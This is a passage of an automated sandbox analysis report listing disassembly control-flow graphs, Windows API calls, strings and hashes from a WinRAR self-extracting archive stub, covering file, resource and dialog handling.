                                                                                                              • LockResource.KERNEL32(00000000,?,?,00459AC8,00000066), ref: 00458C17
                                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00459AC8,00000066), ref: 00458C35
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00458C42
                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00458C62
                                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00458C9D
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00458CB2
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00458CB9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                              • String ID: PNG
                                                                                                              • API String ID: 3656887471-364855578
                                                                                                              • Opcode ID: c2723f1aa2d657dbc7429e5260f4913d66a155e1afad5431d95bfff1ceaef17b
                                                                                                              • Instruction ID: ed0ded58f567c0bdbc8ea1cbd6058324d5d47567b080e4722efdcc652df12628
                                                                                                              • Opcode Fuzzy Hash: c2723f1aa2d657dbc7429e5260f4913d66a155e1afad5431d95bfff1ceaef17b
                                                                                                              • Instruction Fuzzy Hash: B7217571602701AFD7229F21ED4992BBBA8EF85752B00053EFC49D6361DF35D848CA69

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 860 44a273-44a299 call 45cec0 863 44a30d-44a316 FindNextFileW 860->863 864 44a29b-44a2ae FindFirstFileW 860->864 867 44a32c-44a32e 863->867 868 44a318-44a326 GetLastError 863->868 865 44a334-44a3dd call 44f10e call 44b902 call 4501c1 * 3 864->865 866 44a2b4-44a2cf call 44b275 864->866 869 44a3e2-44a3f5 865->869 875 44a2e6-44a2ef GetLastError 866->875 876 44a2d1-44a2e4 FindFirstFileW 866->876 867->865 867->869 868->867 878 44a300 875->878 879 44a2f1-44a2f4 875->879 876->865 876->875 882 44a302-44a308 878->882 879->878 881 44a2f6-44a2f9 879->881 881->878 884 44a2fb-44a2fe 881->884 882->869 884->882
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0044A16E,000000FF,?,?), ref: 0044A2A8
                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0044A16E,000000FF,?,?), ref: 0044A2DE
                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0044A16E,000000FF,?,?), ref: 0044A2E6
                                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0044A16E,000000FF,?,?), ref: 0044A30E
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,0044A16E,000000FF,?,?), ref: 0044A31A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                              • String ID:
                                                                                                              • API String ID: 869497890-0
                                                                                                              • Opcode ID: 6c8dbe1907d715a0dae281cc8b1f333cb006c4776fbc730dff69d9f94b9db594
                                                                                                              • Instruction ID: 32c05fa89ff6feaba790f237963e360b369de1a41ceace166b709c7376831de5
                                                                                                              • Opcode Fuzzy Hash: 6c8dbe1907d715a0dae281cc8b1f333cb006c4776fbc730dff69d9f94b9db594
                                                                                                              • Instruction Fuzzy Hash: 51418276608245AFD324DF64C880ADBF7E8FB49354F000A2FF9D9D3240D778A9648B96
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00464A30,?,00477F68,0000000C,00464B87,?,00000002,00000000), ref: 00464A7B
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00464A30,?,00477F68,0000000C,00464B87,?,00000002,00000000), ref: 00464A82
                                                                                                              • ExitProcess.KERNEL32 ref: 00464A94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: 9dd586c4155bbf54472ed032302a1332ca11a65528b9d4ce061c6dd2928123e6
                                                                                                              • Instruction ID: 156cb60571caf1ac13b3aa3116722656d3cc718756c96a9c87135fb37458a444
                                                                                                              • Opcode Fuzzy Hash: 9dd586c4155bbf54472ed032302a1332ca11a65528b9d4ce061c6dd2928123e6
                                                                                                              • Instruction Fuzzy Hash: EDE04F31041144EFCF116F64DC08A493B29FB40355F000429F80896121DB39DC82CB49
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0044840E
                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00448870
                                                                                                                • Part of subcall function 004480F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,004486E9,?,-00000930,?), ref: 004481BB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharH_prologUpper_memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 4047935103-0
                                                                                                              • Opcode ID: 70e526e0f07df505e2a18c96b411e23c94ea9b15bc07ac0ec752933041426fca
                                                                                                              • Instruction ID: b154196535c4e62d4e8ca27c74a80ab960abef55a62117fb867af61782bd9105
                                                                                                              • Opcode Fuzzy Hash: 70e526e0f07df505e2a18c96b411e23c94ea9b15bc07ac0ec752933041426fca
                                                                                                              • Instruction Fuzzy Hash: E372F970904185AEFF15DF64C885BFEB7A8AF05304F0841BFED499B242DB785A89C768
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog
                                                                                                              • String ID:
                                                                                                              • API String ID: 3519838083-0
                                                                                                              • Opcode ID: 02f44913c07fd032c95240f7b5895e91114a6d939be7836ac7dd38c4804056e2
                                                                                                              • Instruction ID: f7725fbf9435249538f56566227cd791acf4d1142be6fec39c9dae9f08d75139
                                                                                                              • Opcode Fuzzy Hash: 02f44913c07fd032c95240f7b5895e91114a6d939be7836ac7dd38c4804056e2
                                                                                                              • Instruction Fuzzy Hash: 82D1DEB1A047458FDB14CF29C89476BBBE0AF85309F08456EEC449B643D338E95DCB9A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00459B54
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prologItemTextWindow
                                                                                                              • String ID: !H$"%s"%s$*AH$*aH$*xI$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                              • API String ID: 810644672-4167954323
                                                                                                              • Opcode ID: 024997163d4eb02becd20db81ab07c73621c0eb41d1d67bc5b016e8f67442bfd
                                                                                                              • Instruction ID: b52be806fd33ad4b24238eba5613f779904c47e9789f8c2b8af6fc26f0cc300f
                                                                                                              • Opcode Fuzzy Hash: 024997163d4eb02becd20db81ab07c73621c0eb41d1d67bc5b016e8f67442bfd
                                                                                                              • Instruction Fuzzy Hash: 2E421A70940315BEEB21AF609D4AFAF3768AB15705F00006BFE05A61D2D7BC4D98CB6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 257 44f353-44f375 call 45cec0 GetModuleHandleW 260 44f377-44f38e GetProcAddress 257->260 261 44f3c8-44f62f 257->261 264 44f3a0-44f3aa GetProcAddress 260->264 265 44f390-44f39d 260->265 262 44f635-44f640 call 46462a 261->262 263 44f6fd-44f72e GetModuleFileNameW call 44b88c call 44f10e 261->263 262->263 272 44f646-44f673 GetModuleFileNameW CreateFileW 262->272 277 44f730-44f73a call 44a8e0 263->277 264->261 267 44f3ac-44f3c3 264->267 265->264 267->261 275 44f675-44f683 SetFilePointer 272->275 276 44f6f1-44f6f8 CloseHandle 272->276 275->276 278 44f685-44f6a2 ReadFile 275->278 276->263 283 44f747 277->283 284 44f73c-44f740 call 44f309 277->284 278->276 280 44f6a4-44f6c9 278->280 282 44f6e6-44f6ef call 44ef07 280->282 282->276 292 44f6cb-44f6e5 call 44f309 282->292 287 44f749-44f74b 283->287 289 44f745 284->289 290 44f76d-44f78f call 44b902 GetFileAttributesW 287->290 291 44f74d-44f76b CompareStringW 287->291 289->287 294 44f791-44f795 290->294 300 44f799 290->300 291->290 291->294 292->282 294->277 296 44f797 294->296 299 44f79d-44f7a2 296->299 301 44f7a4 299->301 302 44f7d6-44f7d8 299->302 300->299 303 44f7a6-44f7c8 call 44b902 GetFileAttributesW 301->303 304 44f8e5-44f8ef 302->304 305 44f7de-44f7f5 call 44b8d6 call 44a8e0 302->305 310 44f7d2 303->310 311 44f7ca-44f7ce 303->311 315 44f7f7-44f858 call 44f309 * 2 call 44d142 call 443f5b call 44d142 call 458ccb 305->315 316 44f85d-44f890 call 443f5b AllocConsole 305->316 310->302 311->303 313 44f7d0 311->313 313->302 322 44f8dd-44f8df ExitProcess 315->322 321 44f892-44f8d7 GetCurrentProcessId AttachConsole call 4620b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->321 316->322 321->322
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32 ref: 0044F36B
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0044F383
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0044F3A6
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0044F651
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0044F669
                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044F67B
                                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00470858,00000000), ref: 0044F69A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0044F6F2
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0044F708
                                                                                                              • CompareStringW.KERNEL32(00000400,00001001,004708A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0044F762
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00470870,00000800,?,00000000,?,00000800), ref: 0044F78B
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,0G,00000800), ref: 0044F7C4
                                                                                                                • Part of subcall function 0044F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0044F324
                                                                                                                • Part of subcall function 0044F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0044DEC8,Crypt32.dll,?,0044DF4A,?,0044DF2E,?,?,?,?), ref: 0044F346
                                                                                                              • _swprintf.LIBCMT ref: 0044F834
                                                                                                              • _swprintf.LIBCMT ref: 0044F880
                                                                                                                • Part of subcall function 00443F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00443F6E
                                                                                                              • AllocConsole.KERNEL32 ref: 0044F888
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0044F892
                                                                                                              • AttachConsole.KERNEL32(00000000), ref: 0044F899
                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0044F8BF
                                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 0044F8C6
                                                                                                              • Sleep.KERNEL32(00002710), ref: 0044F8D1
                                                                                                              • FreeConsole.KERNEL32 ref: 0044F8D7
                                                                                                              • ExitProcess.KERNEL32 ref: 0044F8DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                              • String ID: G$$G$,G$0G$@G$DG$DG$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\G$\G$`G$dwmapi.dll$kernel32$tG$uxtheme.dll$xG$xG$G$G
                                                                                                              • API String ID: 1201351596-2968649184
                                                                                                              • Opcode ID: 2d832c68a3856edb47967fd5a8ecfc63f980a0857b93fc5eecd2981b60adc4b4
                                                                                                              • Instruction ID: 6913893d7622ccc63e04ae458badea62a5002092cecb469c3f129fb3e12aa88e
                                                                                                              • Opcode Fuzzy Hash: 2d832c68a3856edb47967fd5a8ecfc63f980a0857b93fc5eecd2981b60adc4b4
                                                                                                              • Instruction Fuzzy Hash: B8D151B100A384DAE7319F619849BDFB7E8AB84304F50C92FF58C96241D7B89549CB6F

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 404 45aa45-45aa5d call 45cdf0 call 45cec0 409 45b645-45b652 404->409 410 45aa63-45aa8d call 4596ec 404->410 410->409 413 45aa93-45aa98 410->413 414 45aa99-45aaa7 413->414 415 45aaa8-45aab8 call 4593ba 414->415 418 45aaba 415->418 419 45aabc-45aad1 call 450b12 418->419 422 45aad3-45aad7 419->422 423 45aade-45aae1 419->423 422->419 424 45aad9 422->424 425 45aae7 423->425 426 45b611-45b63c call 4596ec 423->426 424->426 427 45acdd-45acdf 425->427 428 45aaee-45aaf1 425->428 429 45ad7e-45ad80 425->429 430 45ad9b-45ad9d 425->430 426->414 441 45b642-45b644 426->441 427->426 435 45ace5-45acf1 427->435 428->426 433 45aaf7-45ab64 call 458b8e call 44b56e call 44a11c call 44a256 call 446fa3 call 44a1a9 428->433 429->426 432 45ad86-45ad96 SetWindowTextW 429->432 430->426 434 45ada3-45adaa 430->434 432->426 503 45acc9-45acd8 call 44a132 433->503 504 45ab6a-45ab70 433->504 434->426 438 45adb0-45adc9 434->438 439 45ad05-45ad0a 435->439 440 45acf3-45ad04 call 464654 435->440 445 45add1-45addf call 4620b3 438->445 446 45adcb 438->446 442 45ad14-45ad1f call 459844 439->442 443 45ad0c-45ad12 439->443 440->439 441->409 448 45ad24-45ad26 442->448 443->448 445->426 461 45ade5-45adee 445->461 446->445 454 45ad31-45ad51 call 4620b3 call 4620de 448->454 455 45ad28-45ad2f call 4620b3 448->455 481 45ad53-45ad5a 454->481 482 45ad6a-45ad6c 454->482 455->454 462 45ae17-45ae1a 461->462 463 45adf0-45adf4 461->463 468 45ae20-45ae23 462->468 469 45aeff-45af0d call 44f10e 462->469 463->462 467 45adf6-45adfe 463->467 467->426 474 45ae04-45ae12 call 44f10e 467->474 475 45ae25-45ae2a 468->475 476 45ae30-45ae4b 468->476 484 45af0f-45af23 call 46031b 469->484 474->484 475->469 475->476 494 45ae95-45ae9c 476->494 495 45ae4d-45ae87 476->495 488 45ad61-45ad69 call 464654 481->488 489 45ad5c-45ad5e 481->489 482->426 485 45ad72-45ad79 call 4620ce 482->485 505 45af25-45af29 484->505 506 45af30-45af83 call 44f10e call 459592 GetDlgItem SetWindowTextW SendMessageW call 4620e9 484->506 485->426 488->482 489->488 497 45ae9e-45aeb6 call 4620b3 494->497 498 45aeca-45aeed call 4620b3 * 2 494->498 522 45ae89 495->522 523 45ae8b-45ae8d 495->523 497->498 515 45aeb8-45aec5 call 44f0e6 497->515 498->484 534 45aeef-45aefd call 44f0e6 498->534 503->426 510 45ab77-45ab8c SetFileAttributesW 504->510 505->506 511 45af2b-45af2d 505->511 543 45af88-45af8c 506->543 516 45ac32-45ac3e GetFileAttributesW 510->516 517 45ab92-45abc5 call 44b100 call 44adf5 call 4620b3 510->517 511->506 515->498 527 45ac40-45ac4f DeleteFileW 516->527 528 45acae-45acc3 call 44a1a9 516->528 552 45abc7-45abd6 call 4620b3 517->552 553 45abd8-45abe6 call 44b52e 517->553 522->523 523->494 527->528 533 45ac51-45ac54 527->533 528->503 541 45ab72 528->541 538 45ac58-45ac84 call 443f5b GetFileAttributesW 533->538 534->484 548 45ac56-45ac57 538->548 549 45ac86-45ac9c MoveFileW 538->549 541->510 543->426 547 45af92-45afa4 SendMessageW 543->547 547->426 548->538 549->528 551 45ac9e-45aca8 MoveFileExW 549->551 551->528 552->553 558 45abec-45ac2b call 4620b3 call 45dea0 552->558 553->503 553->558 558->516
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0045AA4A
                                                                                                                • Part of subcall function 004596EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004597B4
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0045A35D,?,00000000), ref: 0045AB7F
                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0045AC39
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0045AC47
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0045AD90
                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0045AF1A
                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0045AF55
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045AF65
                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0048412A), ref: 0045AF79
                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045AFA2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                              • String ID: %s.%d.tmp$*AH$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                              • API String ID: 3676479488-3647346186
                                                                                                              • Opcode ID: 043f4fead15dabdd00541f7ee2139c46240c346ebb6d4dacde91157d8ff90aa6
                                                                                                              • Instruction ID: a62cad66292c06679c38b207ad86b5dbc5a67a014367d3a9f7b2cb6a15a95840
                                                                                                              • Opcode Fuzzy Hash: 043f4fead15dabdd00541f7ee2139c46240c346ebb6d4dacde91157d8ff90aa6
                                                                                                              • Instruction Fuzzy Hash: 8DE18272900119AAEF20EB61DD45DDF737CEB05345F1041ABF909E3142EB789B98CB6A

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 563 44ced7-44cf51 call 44c88e GetWindowRect GetClientRect 566 44cf57-44cf5f 563->566 567 44cff2-44cffa 563->567 568 44d034-44d04f GetSystemMetrics GetWindow 566->568 570 44cf65-44cfae 566->570 567->568 569 44cffc-44d02e GetWindowTextW call 44c91f SetWindowTextW 567->569 572 44d12d-44d12f 568->572 569->568 573 44cfb0 570->573 574 44cfb2-44cfb4 570->574 575 44d054-44d05a 572->575 576 44d135-44d13f 572->576 573->574 578 44cfb6 574->578 579 44cfb8-44cfee GetWindowLongW GetWindowRect 574->579 575->576 580 44d060-44d078 GetWindowTextW 575->580 578->579 579->567 582 44d09f-44d0a4 580->582 583 44d07a-44d099 call 44c91f SetWindowTextW 580->583 585 44d0a6-44d114 GetWindowRect 582->585 586 44d11b-44d12a GetWindow 582->586 583->582 585->586 586->576 587 44d12c 586->587 587->572
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044C88E: _wcschr.LIBVCRUNTIME ref: 0044C8BD
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0044CF0E
                                                                                                              • GetClientRect.USER32(?,?), ref: 0044CF1A
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044CFBB
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0044CFE8
                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0044D007
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0044D02E
                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 0044D036
                                                                                                              • GetWindow.USER32(?,00000005), ref: 0044D041
                                                                                                              • GetWindowTextW.USER32(00000000,?,00000400), ref: 0044D06C
                                                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 0044D099
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0044D0AC
                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0044D11E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                                              • String ID: d
                                                                                                              • API String ID: 4134264131-2564639436
                                                                                                              • Opcode ID: d9b305f34367dd849b9e5184e26df3ebd0b2436a8f8f7ca6f14b8dc85445251c
                                                                                                              • Instruction ID: 0c9c8e5f1e3f37cf18b559e44ac071d6ffdafca5c4664ae6e835973391fff75b
                                                                                                              • Opcode Fuzzy Hash: d9b305f34367dd849b9e5184e26df3ebd0b2436a8f8f7ca6f14b8dc85445251c
                                                                                                              • Instruction Fuzzy Hash: CD617071108300AFE310DF69CD89E6FBBEAFBC9714F04452EF68492290D674E945CB56

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(00000068,00498958), ref: 0045B71D
                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00459325), ref: 0045B748
                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0045B757
                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004702E4), ref: 0045B761
                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0045B777
                                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0045B78D
                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0045B7CD
                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0045B7D7
                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0045B7E6
                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0045B809
                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00471368), ref: 0045B814
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
